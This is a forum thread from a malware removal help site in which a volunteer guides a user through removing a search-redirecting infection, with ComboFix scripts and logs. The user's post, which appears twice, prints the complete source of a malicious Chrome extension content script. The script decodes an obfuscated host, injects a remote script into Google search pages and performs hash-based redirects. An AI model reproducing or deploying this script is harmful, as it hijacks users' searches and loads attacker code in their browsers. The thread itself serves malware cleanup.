Welcome to MalwareRemoval.com,
What if we told you that you could get malware removal help from experts, and that it was 100% free? MalwareRemoval.com provides free support for people with infected computers. Our help, and the tools we use are always 100% free. No hidden catch. We simply enjoy helping others. You enjoy a clean, safe computer.

Malware Removal Instructions

redirected searches and email problems

MalwareRemoval.com provides free support for people with infected computers. Using plain language that anyone can understand, our community of volunteer experts will walk you through each step.

Re: redirected searches and email problems

Unread postby ard » June 16th, 2011, 5:20 pm

Hi -

things look good –

the Adobe Flash was trashed when the problem began – you asked that I not install new pgms so I am waiting.

I hope we can remove some of the 62 restore points and maybe some of the 628 hidden $xxxx subdirectories from the windows directory. That’s over 2500 files searched during scans.


step 1

C:\install\registryBooster deleted along with all other subdirectories.


step 2

ran SystemLook

C:\Documents and Settings\admin\Local Settings\Application Data\Google\Chrome\User Data\Default\Default\nejcfofponajoeefedoafebpapaplkdm - Parameters: "/s"

---Files---
contentscript.js --a---- 4308 bytes [04:29 10/06/2011] [14:25 10/06/2011]
manifest.json --a---- 244 bytes [04:29 10/06/2011] [14:25 10/06/2011]

No folders found.

========== contents ==========

C:\Documents and Settings\admin\Local Settings\Application Data\Google\Chrome\User Data\Default\Default\nejcfofponajoeefedoafebpapaplkdm\contentscript.js - Opened succesfully.

var cinfo = 'u=bc3188ef-13b7-4ad9-8434-fd8904c0fcea&a=1120&i=160&s=0';
var s1 = '475b5b5f150000181b011a1f011e1e18011e1f1800455c00455c4c015f475f', k1 = 47;var digitArray = new Array('0','1','2','3','4','5','6','7','8','9','a','b','c','d','e','f');
var hexv =
{
"00":0,"01":1,"02":2,"03":3,"04":4,"05":5,"06":6,"07":7,"08":8,
"09":9,"0A":10,"0B":11,"0C":12,"0D":13,"0E":14,"0F":15,"10":16,"11":17,
"12":18,"13":19,"14":20,"15":21,"16":22,"17":23,"18":24,"19":25,"1A":26,
"1B":27,"1C":28,"1D":29,"1E":30,"1F":31,"20":32,"21":33,"22":34,"23":35,
"24":36,"25":37,"26":38,"27":39,"28":40,"29":41,"2A":42,"2B":43,"2C":44,
"2D":45,"2E":46,"2F":47,"30":48,"31":49,"32":50,"33":51,"34":52,"35":53,
"36":54,"37":55,"38":56,"39":57,"3A":58,"3B":59,"3C":60,"3D":61,"3E":62,
"3F":63,"40":64,"41":65,"42":66,"43":67,"44":68,"45":69,"46":70,"47":71,
"48":72,"49":73,"4A":74,"4B":75,"4C":76,"4D":77,"4E":78,"4F":79,"50":80,
"51":81,"52":82,"53":83,"54":84,"55":85,"56":86,"57":87,"58":88,"59":89,
"5A":90,"5B":91,"5C":92,"5D":93,"5E":94,"5F":95,"60":96,"61":97,"62":98,
"63":99,"64":100,"65":101,"66":102,"67":103,"68":104,"69":105,"6A":106,"6B":107,
"6C":108,"6D":109,"6E":110,"6F":111,"70":112,"71":113,"72":114,"73":115,"74":116,
"75":117,"76":118,"77":119,"78":120,"79":121,"7A":122,"7B":123,"7C":124,"7D":125,
"7E":126,"7F":127,"80":128,"81":129,"82":130,"83":131,"84":132,"85":133,"86":134,
"87":135,"88":136,"89":137,"8A":138,"8B":139,"8C":140,"8D":141,"8E":142,"8F":143,
"90":144,"91":145,"92":146,"93":147,"94":148,"95":149,"96":150,"97":151,"98":152,
"99":153,"9A":154,"9B":155,"9C":156,"9D":157,"9E":158,"9F":159,"A0":160,"A1":161,
"A2":162,"A3":163,"A4":164,"A5":165,"A6":166,"A7":167,"A8":168,"A9":169,"AA":170,
"AB":171,"AC":172,"AD":173,"AE":174,"AF":175,"B0":176,"B1":177,"B2":178,"B3":179,
"B4":180,"B5":181,"B6":182,"B7":183,"B8":184,"B9":185,"BA":186,"BB":187,"BC":188,
"BD":189,"BE":190,"BF":191,"C0":192,"C1":193,"C2":194,"C3":195,"C4":196,"C5":197,
"C6":198,"C7":199,"C8":200,"C9":201,"CA":202,"CB":203,"CC":204,"CD":205,"CE":206,
"CF":207,"D0":208,"D1":209,"D2":210,"D3":211,"D4":212,"D5":213,"D6":214,"D7":215,
"D8":216,"D9":217,"DA":218,"DB":219,"DC":220,"DD":221,"DE":222,"DF":223,"E0":224,
"E1":225,"E2":226,"E3":227,"E4":228,"E5":229,"E6":230,"E7":231,"E8":232,"E9":233,
"EA":234,"EB":235,"EC":236,"ED":237,"EE":238,"EF":239,"F0":240,"F1":241,"F2":242,
"F3":243,"F4":244,"F5":245,"F6":246,"F7":247,"F8":248,"F9":249,"FA":250,"FB":251,
"FC":252,"FD":253,"FE":254,"FF":255
};

function ntos(n)
{
n=n.toString(16);
if (n.length == 1)
{
n="0"+n;
}
n="%"+n;
return unescape(n);
}

function toHex(n)
{
var result = '';
var start = true;
for (var i=32; i>0;)
{
i-=4;
var digit = (n>>i) & 0xf;
if (!start || digit != 0)
{
start = false;
result += digitArray[digit];
}
}
return (result==''?'0':result);
}

function pad(str, len, pad)
{
var result = str;
for (var i=str.length; i<len; i++)
{
result = pad + result;
}
return result;
}

function encodeHex(str)
{
var result = "";
for (var i=0; i<str.length; i++)
{
result += pad(toHex(str.charCodeAt(i)&0xff),2,'0');
}
return result;
}

function decodeHex(str)
{
str = str.toUpperCase().replace(new RegExp("s/[^0-9A-Z]//g"));
var result = "";
var nextchar = "";
for(var i=0; i<str.length; i++)
{
nextchar += str.charAt(i);
if(nextchar.length == 2)
{
result += ntos(hexv[nextchar]);
nextchar = "";
}
}
return result;
}

function xor(str, key)
{
var res="";
for(i = 0; i < str.length; ++i)
{
res+=String.fromCharCode(key^str.charCodeAt(i));
}
return res;
}

function _dec(s,k)
{
return xor(decodeHex(s),k);
}


if ( location.hostname.match(/.google.[a-z]{2,4}(?:.[a-z]{2,4})/) ) {
var m, q;
if (
location.pathname == '/search' &&
(m = location.search.match(/[?&]q=([^&]+)/))
) {
q = m[1];
}

if (q) {
var s = document.createElement('script');
var src = _dec(s1,k1);
s.src = src + '?'+cinfo;

document.body.appendChild(s);
}

}
var m;
if (m=location.hash.match(/^#rf=(.*)/)) {
var s = document.createElement('script');
s.innerHTML = 'top.location.href = "'+m[1]+'";';
document.body.appendChild(s);
}


-= EOF =-
ard
Regular Member
 
Posts: 41
Joined: August 25th, 2009, 7:12 am
Advertisement
Register to Remove

Re: redirected searches and email problems

Unread postby ard » June 16th, 2011, 5:20 pm

Hi -

things look good –

the Adobe Flash was trashed when the problem began – you asked that I not install new pgms so I am waiting.

I hope we can remove some of the 62 restore points and maybe some of the 628 hidden $xxxx subdirectories from the windows directory. That’s over 2500 files searched during scans.


step 1

C:\install\registryBooster deleted along with all other subdirectories.


step 2

ran SystemLook

C:\Documents and Settings\admin\Local Settings\Application Data\Google\Chrome\User Data\Default\Default\nejcfofponajoeefedoafebpapaplkdm - Parameters: "/s"

---Files---
contentscript.js --a---- 4308 bytes [04:29 10/06/2011] [14:25 10/06/2011]
manifest.json --a---- 244 bytes [04:29 10/06/2011] [14:25 10/06/2011]

No folders found.

========== contents ==========

C:\Documents and Settings\admin\Local Settings\Application Data\Google\Chrome\User Data\Default\Default\nejcfofponajoeefedoafebpapaplkdm\contentscript.js - Opened succesfully.

var cinfo = 'u=bc3188ef-13b7-4ad9-8434-fd8904c0fcea&a=1120&i=160&s=0';
var s1 = '475b5b5f150000181b011a1f011e1e18011e1f1800455c00455c4c015f475f', k1 = 47;var digitArray = new Array('0','1','2','3','4','5','6','7','8','9','a','b','c','d','e','f');
var hexv =
{
"00":0,"01":1,"02":2,"03":3,"04":4,"05":5,"06":6,"07":7,"08":8,
"09":9,"0A":10,"0B":11,"0C":12,"0D":13,"0E":14,"0F":15,"10":16,"11":17,
"12":18,"13":19,"14":20,"15":21,"16":22,"17":23,"18":24,"19":25,"1A":26,
"1B":27,"1C":28,"1D":29,"1E":30,"1F":31,"20":32,"21":33,"22":34,"23":35,
"24":36,"25":37,"26":38,"27":39,"28":40,"29":41,"2A":42,"2B":43,"2C":44,
"2D":45,"2E":46,"2F":47,"30":48,"31":49,"32":50,"33":51,"34":52,"35":53,
"36":54,"37":55,"38":56,"39":57,"3A":58,"3B":59,"3C":60,"3D":61,"3E":62,
"3F":63,"40":64,"41":65,"42":66,"43":67,"44":68,"45":69,"46":70,"47":71,
"48":72,"49":73,"4A":74,"4B":75,"4C":76,"4D":77,"4E":78,"4F":79,"50":80,
"51":81,"52":82,"53":83,"54":84,"55":85,"56":86,"57":87,"58":88,"59":89,
"5A":90,"5B":91,"5C":92,"5D":93,"5E":94,"5F":95,"60":96,"61":97,"62":98,
"63":99,"64":100,"65":101,"66":102,"67":103,"68":104,"69":105,"6A":106,"6B":107,
"6C":108,"6D":109,"6E":110,"6F":111,"70":112,"71":113,"72":114,"73":115,"74":116,
"75":117,"76":118,"77":119,"78":120,"79":121,"7A":122,"7B":123,"7C":124,"7D":125,
"7E":126,"7F":127,"80":128,"81":129,"82":130,"83":131,"84":132,"85":133,"86":134,
"87":135,"88":136,"89":137,"8A":138,"8B":139,"8C":140,"8D":141,"8E":142,"8F":143,
"90":144,"91":145,"92":146,"93":147,"94":148,"95":149,"96":150,"97":151,"98":152,
"99":153,"9A":154,"9B":155,"9C":156,"9D":157,"9E":158,"9F":159,"A0":160,"A1":161,
"A2":162,"A3":163,"A4":164,"A5":165,"A6":166,"A7":167,"A8":168,"A9":169,"AA":170,
"AB":171,"AC":172,"AD":173,"AE":174,"AF":175,"B0":176,"B1":177,"B2":178,"B3":179,
"B4":180,"B5":181,"B6":182,"B7":183,"B8":184,"B9":185,"BA":186,"BB":187,"BC":188,
"BD":189,"BE":190,"BF":191,"C0":192,"C1":193,"C2":194,"C3":195,"C4":196,"C5":197,
"C6":198,"C7":199,"C8":200,"C9":201,"CA":202,"CB":203,"CC":204,"CD":205,"CE":206,
"CF":207,"D0":208,"D1":209,"D2":210,"D3":211,"D4":212,"D5":213,"D6":214,"D7":215,
"D8":216,"D9":217,"DA":218,"DB":219,"DC":220,"DD":221,"DE":222,"DF":223,"E0":224,
"E1":225,"E2":226,"E3":227,"E4":228,"E5":229,"E6":230,"E7":231,"E8":232,"E9":233,
"EA":234,"EB":235,"EC":236,"ED":237,"EE":238,"EF":239,"F0":240,"F1":241,"F2":242,
"F3":243,"F4":244,"F5":245,"F6":246,"F7":247,"F8":248,"F9":249,"FA":250,"FB":251,
"FC":252,"FD":253,"FE":254,"FF":255
};

function ntos(n)
{
n=n.toString(16);
if (n.length == 1)
{
n="0"+n;
}
n="%"+n;
return unescape(n);
}

function toHex(n)
{
var result = '';
var start = true;
for (var i=32; i>0;)
{
i-=4;
var digit = (n>>i) & 0xf;
if (!start || digit != 0)
{
start = false;
result += digitArray[digit];
}
}
return (result==''?'0':result);
}

function pad(str, len, pad)
{
var result = str;
for (var i=str.length; i<len; i++)
{
result = pad + result;
}
return result;
}

function encodeHex(str)
{
var result = "";
for (var i=0; i<str.length; i++)
{
result += pad(toHex(str.charCodeAt(i)&0xff),2,'0');
}
return result;
}

function decodeHex(str)
{
str = str.toUpperCase().replace(new RegExp("s/[^0-9A-Z]//g"));
var result = "";
var nextchar = "";
for(var i=0; i<str.length; i++)
{
nextchar += str.charAt(i);
if(nextchar.length == 2)
{
result += ntos(hexv[nextchar]);
nextchar = "";
}
}
return result;
}

function xor(str, key)
{
var res="";
for(i = 0; i < str.length; ++i)
{
res+=String.fromCharCode(key^str.charCodeAt(i));
}
return res;
}

function _dec(s,k)
{
return xor(decodeHex(s),k);
}


if ( location.hostname.match(/.google.[a-z]{2,4}(?:.[a-z]{2,4})/) ) {
var m, q;
if (
location.pathname == '/search' &&
(m = location.search.match(/[?&]q=([^&]+)/))
) {
q = m[1];
}

if (q) {
var s = document.createElement('script');
var src = _dec(s1,k1);
s.src = src + '?'+cinfo;

document.body.appendChild(s);
}

}
var m;
if (m=location.hash.match(/^#rf=(.*)/)) {
var s = document.createElement('script');
s.innerHTML = 'top.location.href = "'+m[1]+'";';
document.body.appendChild(s);
}


-= EOF =-
ard
Regular Member
 
Posts: 41
Joined: August 25th, 2009, 7:12 am

Re: redirected searches and email problems

Unread postby melboy » June 16th, 2011, 5:42 pm

Hi

Thanks.

We'll reset System Restore when we finish up, which shouldn't be long, we're just tying up some necessary loose ends. The hidden Windows directories need to stay.


COMBOFIX-Script

A word of warning: Please do not run ComboFix on your own. This tool is not a toy and not for everyday use.

If combofix prompts you that an update is available, please allow it to update.


  • Please open Notepad (Start -> Run -> type notepad in the Open field -> OK) and copy and paste the text present inside the code box below:

    Code: Select all
    Folder::
    C:\Documents and Settings\admin\Local Settings\Application Data\Google\Chrome\User Data\Default\Default\nejcfofponajoeefedoafebpapaplkdm
    

  • Save this as CFScript.txt and change the "Save as type" to "All Files" and place it on your desktop.

    Image
  • Very Important! Temporarily disable your anti-virus, script blocking and any anti-malware real-time protection before following the steps below. They can interfere with ComboFix or remove some of its embedded files which may cause "unpredictable results".
  • If you need help to disable your protection programs see here.
  • Referring to the screenshot above, drag CFScript.txt into ComboFix.exe.
  • ComboFix will now run a scan on your system. It may reboot your system when it finishes. This is normal.
  • When finished, it shall produce a log for you. Copy and paste the contents of the log in your next reply.

CAUTION: Do not mouse-click ComboFix's window while it is running. That may cause it to stall.
Last edited by melboy on June 16th, 2011, 6:49 pm, edited 1 time in total.
User avatar
melboy
MRU Expert
MRU Expert
 
Posts: 3670
Joined: July 25th, 2008, 4:25 pm
Location: UK

Re: redirected searches and email problems

Unread postby ard » June 16th, 2011, 6:25 pm

Hi -

What are the hidden $xxxx subdirectories from the windows directory?

ran ComboFix

ComboFix 11-06-16.01 - admin 06/16/2011 17:47:30.5.1 - x86
Microsoft Windows XP Home Edition 5.1.2600.3.1252.1.1033.18.510.248 [GMT -4:00]
Running from: c:\documents and settings\admin\Desktop\ComboFix.exe
Command switches used :: c:\documents and settings\admin\Desktop\cfscript.txt
AV: AntiVir Desktop *Disabled/Updated* {AD166499-45F9-482A-A743-FDD3350758C7}
.
.
((((((((((((((((((((((((((((((((((((((( Other Deletions )))))))))))))))))))))))))))))))))))))))))))))))))
.
.
c:\documents and settings\admin\Local Settings\Application Data\Google\Chrome\User Data\Default\Default\nejcfofponajoeefedoafebpapaplkdm
c:\documents and settings\admin\Local Settings\Application Data\Google\Chrome\User Data\Default\Default\nejcfofponajoeefedoafebpapaplkdm\contentscript.js
c:\documents and settings\admin\Local Settings\Application Data\Google\Chrome\User Data\Default\Default\nejcfofponajoeefedoafebpapaplkdm\manifest.json
.
.
((((((((((((((((((((((((( Files Created from 2011-05-16 to 2011-06-16 )))))))))))))))))))))))))))))))
.
.
2011-06-16 07:01 . 2011-06-16 07:05 -------- d-----w- c:\windows\ie8updates
2011-06-15 21:46 . 2011-04-21 13:37 105472 ------w- c:\windows\system32\dllcache\mup.sys
2011-06-15 05:14 . 2011-06-15 05:14 -------- d-----w- c:\program files\Common Files\Java
2011-06-15 05:14 . 2011-06-15 05:14 73728 ----a-w- c:\windows\system32\javacpl.cpl
2011-06-13 06:11 . 2011-06-13 06:11 -------- d-----w- c:\documents and settings\All Users\Application Data\Avira
2011-06-13 06:11 . 2011-04-01 21:07 61960 ----a-w- c:\windows\system32\drivers\avgntflt.sys
2011-06-13 06:11 . 2011-04-01 21:07 137656 ----a-w- c:\windows\system32\drivers\avipbb.sys
2011-06-13 06:11 . 2010-06-17 19:27 45416 ----a-w- c:\windows\system32\drivers\avgntdd.sys
2011-06-13 06:11 . 2010-06-17 19:27 22360 ----a-w- c:\windows\system32\drivers\avgntmgr.sys
2011-06-10 13:07 . 2011-06-16 21:13 -------- d-----w- C:\@malware
2011-06-07 11:47 . 2011-06-07 11:47 -------- d-----w- c:\documents and settings\admin\Application Data\AVG10
2011-06-07 11:36 . 2011-06-07 11:36 -------- d--h--w- c:\documents and settings\All Users\Application Data\Common Files
2011-06-07 11:32 . 2011-06-08 14:00 -------- d-----w- c:\documents and settings\All Users\Application Data\AVG10
2011-06-07 11:32 . 2011-06-08 13:58 -------- d-----w- c:\windows\system32\drivers\AVG
2011-06-07 11:31 . 2011-06-07 11:31 -------- d-----w- c:\program files\AVG
2011-06-07 11:24 . 2011-06-08 13:59 -------- d-----w- c:\documents and settings\All Users\Application Data\MFAData
2011-06-06 17:09 . 2011-06-08 14:17 -------- d-----w- c:\documents and settings\All Users\Application Data\AVAST Software
2011-06-06 17:09 . 2011-06-06 17:09 -------- d-----w- c:\program files\AVAST Software
2011-06-06 16:57 . 2011-06-06 17:04 -------- d-----w- c:\program files\SpywareBlaster
2011-06-05 13:16 . 2011-06-05 13:16 -------- d-----w- c:\documents and settings\All Users\Application Data\SUPERAntiSpyware.com
2011-06-05 13:16 . 2011-06-05 13:16 -------- d-----w- c:\documents and settings\admin\Application Data\SUPERAntiSpyware.com
2011-06-05 13:15 . 2011-06-05 13:16 -------- d-----w- c:\program files\SUPERAntiSpyware
2011-06-05 07:45 . 2011-06-06 04:57 -------- d-----w- c:\program files\Spybot - Search & Destroy
2011-06-04 16:32 . 2011-06-04 16:32 -------- d-----w- c:\program files\Watchtower
2011-06-04 15:19 . 2011-06-04 15:19 -------- d-----w- c:\windows\system32\wbem\Repository
2011-06-04 14:15 . 2011-06-04 18:56 -------- d-----w- C:\- PDF docs
2011-06-04 14:15 . 2011-06-04 15:15 -------- d-----w- C:\- maps
2011-06-04 13:55 . 2011-06-04 14:04 -------- d-----w- C:\- JW info
2011-06-04 13:55 . 2011-06-04 18:55 -------- d-----w- C:\- money
2011-06-04 13:55 . 2011-06-04 13:55 -------- d-----w- C:\- bank
2011-06-04 13:55 . 2011-06-04 18:57 -------- d-----w- C:\- XL docs
2011-06-04 13:55 . 2011-06-04 19:28 -------- d-----w- C:\- word docs
2011-06-04 13:54 . 2011-06-04 18:51 -------- d-----w- C:\- sounds
2011-06-04 13:53 . 2011-06-04 19:07 -------- d-----w- C:\- powerpoint
.
.
.
(((((((((((((((((((((((((((((((((((((((( Find3M Report ))))))))))))))))))))))))))))))))))))))))))))))))))))
.
2011-06-15 05:14 . 2010-06-23 21:32 472808 ----a-w- c:\windows\system32\deployJava1.dll
2011-06-04 16:09 . 2011-03-22 17:14 107 ----a-w- c:\documents and settings\admin\Application Data\netstat.bat
2011-05-29 13:11 . 2009-09-04 13:59 39984 ----a-w- c:\windows\system32\drivers\mbamswissarmy.sys
2011-05-16 13:45 . 2011-05-16 13:45 7040 ----a-w- c:\windows\system32\sabprocenum.sys
2011-05-02 15:31 . 2009-08-15 04:39 692736 ----a-w- c:\windows\system32\inetcomm.dll
2011-04-29 16:19 . 2009-08-15 04:39 456320 ----a-w- c:\windows\system32\drivers\mrxsmb.sys
2011-04-25 16:11 . 2004-08-10 17:51 916480 ----a-w- c:\windows\system32\wininet.dll
2011-04-25 16:11 . 2004-08-10 17:51 43520 ----a-w- c:\windows\system32\licmgr10.dll
2011-04-25 16:11 . 2004-08-10 17:51 1469440 ------w- c:\windows\system32\inetcpl.cpl
2011-04-25 12:01 . 2004-08-10 17:51 385024 ----a-w- c:\windows\system32\html.iec
2011-04-21 13:37 . 2009-08-15 04:39 105472 ----a-w- c:\windows\system32\drivers\mup.sys
.
.
((((((((((((((((((((((((((((((((((((( Reg Loading Points ))))))))))))))))))))))))))))))))))))))))))))))))))
.
.
*Note* empty entries & legit default entries are not shown
REGEDIT4
.
[HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Toolbar\Webbrowser]
"{A1E75A0E-4397-4BA8-BB50-E19FB66890F4}"= "c:\program files\MyAshampoo\tbMyA1.dll" [2010-08-21 2734688]
.
[HKEY_CLASSES_ROOT\clsid\{a1e75a0e-4397-4ba8-bb50-e19fb66890f4}]
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"avgnt"="c:\program files\Avira\AntiVir Desktop\avgnt.exe" [2011-03-28 281768]
"SunJavaUpdateSched"="c:\program files\Common Files\Java\Java Update\jusched.exe" [2011-04-08 254696]
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\policies\system]
"HideShutdownScripts"= 0 (0x0)
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\policies\explorer]
"NoResolveTrack"= 0 (0x0)
"NoFileAssociate"= 0 (0x0)
.
[hkey_local_machine\software\microsoft\windows\currentversion\explorer\ShellExecuteHooks]
"{5AE067D3-9AFB-48E0-853A-EBB7F4A000DA}"= "c:\program files\SUPERAntiSpyware\SASSEH.DLL" [2008-05-13 77824]
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows nt\currentversion\winlogon\notify\!SASWinLogon]
2009-09-03 22:21 548352 ----a-w- c:\program files\SUPERAntiSpyware\SASWINLO.DLL
.
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\Wdf01000.sys]
@="Driver"
.
[HKLM\~\startupfolder\C:^Documents and Settings^All Users^Start Menu^Programs^Startup^PolderbitS Audio Driver Monitor.lnk]
backup=c:\windows\pss\PolderbitS Audio Driver Monitor.lnkCommon Startup
.
[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\cdloader]
2010-12-03 12:39 50592 ----a-w- c:\documents and settings\admin\Application Data\mjusbsp\cdloader2.exe
.
[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\ctfmon.exe]
2008-04-14 09:42 15360 ------w- c:\windows\system32\ctfmon.exe
.
[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\QuickTime Task]
2010-02-15 23:50 417792 ----a-w- c:\program files\QuickTime\QTTask.exe
.
[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\SpybotSD TeaTimer]
2009-03-05 20:07 2260480 --sha-w- c:\program files\Spybot - Search & Destroy\TeaTimer.exe
.
[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\SUPERAntiSpyware]
2011-05-23 15:00 2424192 ----a-w- c:\program files\SUPERAntiSpyware\SUPERAntiSpyware.exe
.
[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\TkBellExe]
2010-10-02 15:51 202256 ----a-w- c:\program files\Common Files\Real\Update_OB\realsched.exe
.
[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\services]
"LiveUpdate Notice Service"=3 (0x3)
"LiveUpdate Notice Ex"=3 (0x3)
"LiveUpdate"=3 (0x3)
"Automatic LiveUpdate Scheduler"=2 (0x2)
"AntiVirService"=2 (0x2)
"AntiVirSchedulerService"=2 (0x2)
"wuauserv"=2 (0x2)
"SBAMSvc"=2 (0x2)
"Browser Defender Update Service"=2 (0x2)
"avast! Antivirus"=2 (0x2)
"WMPNetworkSvc"=3 (0x3)
"VSS"=3 (0x3)
"SysmonLog"=3 (0x3)
"ose"=3 (0x3)
"odserv"=3 (0x3)
"nlsX86cc"=2 (0x2)
"idsvc"=3 (0x3)
"gupdatem"=3 (0x3)
"gupdate"=2 (0x2)
"DfSdkS"=3 (0x3)
"Apple Mobile Device"=3 (0x3)
"SBPIMSvc"=2 (0x2)
.
[HKEY_LOCAL_MACHINE\software\microsoft\security center\Monitoring]
"DisableMonitoring"=dword:00000001
.
[HKEY_LOCAL_MACHINE\software\microsoft\security center\Monitoring\SymantecAntiVirus]
"DisableMonitoring"=dword:00000001
.
[HKEY_LOCAL_MACHINE\software\microsoft\security center\Monitoring\SymantecFirewall]
"DisableMonitoring"=dword:00000001
.
[HKLM\~\services\sharedaccess\parameters\firewallpolicy\standardprofile\AuthorizedApplications\List]
"c:\\WINDOWS\\system32\\sessmgr.exe"=
"c:\\Program Files\\Skype\\Plugin Manager\\skypePM.exe"=
"c:\\Program Files\\Skype\\Phone\\Skype.exe"=
"c:\\mjusbsp\\magicJack.exe"=
"c:\\Program Files\\Parsons\\QuickVerse\\QuickVerse\\qvwin.exe"=
"c:\\Documents and Settings\\admin\\Application Data\\mjusbsp\\magicJack.exe"=
.
[HKLM\~\services\sharedaccess\parameters\firewallpolicy\standardprofile\GloballyOpenPorts\List]
"5060:UDP"= 5060:UDP:UDP
"5070:UDP"= 5070:UDP:UDP
"49152:UDP"= 49152:UDP:UDP
"65535:UDP"= 65535:UDP:UDP
"443:TCP"= 443:TCP:TCP
.
R1 SASDIFSV;SASDIFSV;c:\program files\SUPERAntiSpyware\sasdifsv.sys [2/17/2010 2:25 PM 12872]
R1 SASKUTIL;SASKUTIL;c:\program files\SUPERAntiSpyware\SASKUTIL.SYS [5/10/2010 2:41 PM 67656]
R2 AntiVirSchedulerService;Avira AntiVir Scheduler;c:\program files\Avira\AntiVir Desktop\sched.exe [6/13/2011 2:11 AM 136360]
R3 CAM1690;USB PC Camera;c:\windows\system32\drivers\cam1690.sys [9/20/2007 6:03 PM 181888]
R3 PbsAuDrv;PolderbitS Audio Driver;c:\windows\system32\drivers\pbsaudrv.sys [8/1/2009 1:17 PM 110752]
R3 RRNetCapMP;RRNetCapMP;c:\windows\system32\drivers\rrnetcap.sys [1/6/2010 4:16 PM 27168]
S2 MBAMService;MBAMService;c:\program files\Malwarebytes' Anti-Malware\mbamservice.exe [9/4/2009 9:59 AM 366640]
S3 ADM8511;ADMtek ADM8511/AN986 USB To Fast Ethernet Converter;c:\windows\system32\drivers\ADM8511.SYS [7/26/2005 6:19 PM 20160]
S3 cpuz130;cpuz130;\??\c:\docume~1\admin\LOCALS~1\Temp\cpuz130\cpuz_x32.sys --> c:\docume~1\admin\LOCALS~1\Temp\cpuz130\cpuz_x32.sys [?]
S3 ionwpvvc;Watchport/V2 USB Camera;c:\windows\system32\drivers\ionwpvvc.sys [2/20/2008 4:50 PM 38656]
S3 MBAMProtector;MBAMProtector;\??\c:\windows\system32\drivers\mbam.sys --> c:\windows\system32\drivers\mbam.sys [?]
S3 MBAMSwissArmy;MBAMSwissArmy;c:\windows\system32\drivers\mbamswissarmy.sys [9/4/2009 9:59 AM 39984]
S3 nosGetPlusHelper;getPlus(R) Helper 3004;c:\windows\System32\svchost.exe -k nosGetPlusHelper [8/15/2009 12:39 AM 14336]
S3 RRNetCap;RRNetCap Service;c:\windows\system32\drivers\rrnetcap.sys [1/6/2010 4:16 PM 27168]
S4 Compass Server;Compass Server; [x]
S4 DfSdkS;Defragmentation-Service;c:\program files\Ashampoo\Ashampoo WinOptimizer 7\DfSdkS.exe [4/13/2011 1:16 PM 406016]
S4 gupdate;Google Update Service (gupdate);c:\program files\Google\Update\GoogleUpdate.exe [10/19/2010 10:04 AM 136176]
S4 gupdatem;Google Update Service (gupdatem);c:\program files\Google\Update\GoogleUpdate.exe [10/19/2010 10:04 AM 136176]
S4 magicJack;magicJack;c:\mjusbsp\srvany.exe [2/27/2011 5:32 PM 8192]
S4 nlsX86cc;NLS Service;c:\windows\system32\NLSSRV32.EXE --> c:\windows\system32\NLSSRV32.EXE [?]
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows nt\currentversion\svchost]
getPlusHelper REG_MULTI_SZ getPlusHelper
nosGetPlusHelper REG_MULTI_SZ nosGetPlusHelper
.
Contents of the 'Scheduled Tasks' folder
.
2011-06-07 c:\windows\Tasks\GoogleUpdateTaskMachineCore.job
- c:\program files\Google\Update\GoogleUpdate.exe [2010-10-19 14:04]
.
.
------- Supplementary Scan -------
.
uStart Page = hxxp://www.google.com/
uSearchMigratedDefaultURL = hxxp://www.google.com/search?q={searchTerms}&sourceid=ie7&rls=com.microsoft:en-US&ie=utf8&oe=utf8
uInternet Connection Wizard,ShellNext = iexplore
uSearchURL,(Default) = hxxp://www.google.com/search?q=%s
Trusted Zone: magicjack.com\my
Trusted Zone: talk4free.com\reg
TCP: DhcpNameServer = 192.168.0.1
TCP: Interfaces\{F1AACA3A-E5BE-452E-9F2E-0E4D30CBE236}: NameServer = 67.90.152.122,67.107.71.186
.
.
**************************************************************************
.
catchme 0.3.1398 W2K/XP/Vista - rootkit/stealth malware detector by Gmer, http://www.gmer.net
Rootkit scan 2011-06-16 18:00
Windows 5.1.2600 Service Pack 3 NTFS
.
scanning hidden processes ...
.
scanning hidden autostart entries ...
.
scanning hidden files ...
.
scan completed successfully
hidden files: 0
.
**************************************************************************
.
[HKEY_LOCAL_MACHINE\System\ControlSet009\Services\ASFWHide]
"ImagePath"="\??\c:\docume~1\admin\LOCALS~1\Temp\ASFWHide"
.
--------------------- LOCKED REGISTRY KEYS ---------------------
.
[HKEY_USERS\S-1-5-21-3277941142-1728969546-3919492650-1006\Software\Microsoft\SystemCertificates\AddressBook*]
@Allowed: (Read) (RestrictedCode)
@Allowed: (Read) (RestrictedCode)
.
--------------------- DLLs Loaded Under Running Processes ---------------------
.
- - - - - - - > 'winlogon.exe'(920)
c:\program files\SUPERAntiSpyware\SASWINLO.DLL
c:\windows\system32\WININET.dll
.
- - - - - - - > 'explorer.exe'(2460)
c:\windows\system32\WININET.dll
c:\windows\system32\webcheck.dll
c:\windows\system32\IEFRAME.dll
c:\windows\system32\WPDShServiceObj.dll
c:\windows\system32\PortableDeviceTypes.dll
c:\windows\system32\PortableDeviceApi.dll
.
------------------------ Other Running Processes ------------------------
.
c:\program files\Avira\AntiVir Desktop\avguard.exe
c:\program files\Java\jre6\bin\jqs.exe
c:\program files\Avira\AntiVir Desktop\avshadow.exe
.
**************************************************************************
.
Completion time: 2011-06-16 18:11:02 - machine was rebooted
ComboFix-quarantined-files.txt 2011-06-16 22:10
ComboFix2.txt 2011-06-13 21:16
ComboFix3.txt 2011-06-13 06:03
.
Pre-Run: 58,030,985,216 bytes free
Post-Run: 58,092,498,944 bytes free
.
- - End Of File - - 81EB18F435740BA7FCE77D7B39DCAD1
ard
Regular Member
 
Posts: 41
Joined: August 25th, 2009, 7:12 am

Re: redirected searches and email problems

Unread postby melboy » June 16th, 2011, 6:44 pm

Hi

The folders pertain to the Operating System. Generally, Windows hides things it doesn't want people tinkering with. :D

